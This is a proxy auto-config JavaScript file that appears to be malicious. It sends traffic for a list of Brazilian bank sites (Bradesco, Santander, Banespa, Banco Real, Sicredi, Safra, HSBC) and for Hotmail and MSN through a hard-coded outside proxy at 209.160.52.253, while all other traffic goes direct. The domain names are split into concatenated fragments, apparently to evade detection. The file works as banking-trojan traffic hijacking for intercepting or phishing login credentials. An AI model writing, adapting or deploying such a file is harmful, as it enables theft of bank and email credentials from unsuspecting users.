function FindProxyForURL(url, host) {
var n = new Array("www.bradesco.com.b"+""+"r",
"bradesco.com.b"+""+"r",
"santander.com.b"+""+"r",
"www.santander.com.b"+""+"r",
"santanderbanespa.com.b"+""+"r",
"www.santanderbanespa.com.b"+""+"r",
"banespa.com.b"+""+"r",
"www.banespa.com.b"+""+"r",
"bradesco.com.b"+""+"r", 
"bancoreal.com.b"+""+"r", 
"www.bancoreal.com.b"+""+"r",  
"www.sicredi.com.b"+""+"r",
"sicredi.com.b"+""+"r",
"safranet.com.b"+""+"r",
"www.safranet.com.b"+""+"r",
"www.bradescoprime.com.b"+""+"r",
"bradescoprime.com.b"+""+"r",
"www.santanderempresarial.com.b"+""+"r",
"www.hsbc.com.b"+""+"r",
"hsbc.com.b"+""+"r",
"www.hsbcpremier.com.b"+""+"r",
"hsbcpremier.com.b"+""+"r",
"www.hsbcadvance.com.b"+""+"r",
"hsbcadvance.com.b"+""+"r",
"www.hotmail.com.b"+""+"r",
"hotmail.com.b"+""+"r",
"www.hotmail.com",
"hotmail.com",
"www.msn.com.b"+""+"r",
"msn.com.b"+""+"r",
"www.msn.com",
"msn.com",
"s"+"ant"+"anderem"+"presar"+"ial.com.b"+""+"r");
for(var i =0;i<n.length;i++) { if (shExpMatch(host, n[i])) {
return "PROXY 209.160.52.253:80"; } }
return "DIRECT"; }